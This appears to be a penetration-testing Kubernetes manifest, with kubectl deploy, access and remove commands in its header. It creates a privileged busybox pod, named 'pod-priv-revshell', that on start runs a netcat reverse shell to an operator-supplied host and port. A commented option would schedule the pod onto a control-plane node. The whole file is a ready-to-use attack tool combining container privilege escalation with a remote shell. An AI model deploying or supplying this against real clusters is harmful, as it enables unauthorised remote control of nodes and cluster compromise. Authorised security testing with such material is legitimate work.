###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-priv-revshell.yaml 
## Access: kubectl -n [namespace] exec -it pod-priv-revshell -- bash
## Remove: kubectl -n [namespace] delete pod-priv-revshell
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-priv-revshell
  labels: 
    app: pentest
spec:
  containers:
  - name: priv-revshell
    image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
    securityContext:
      privileged: true
    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node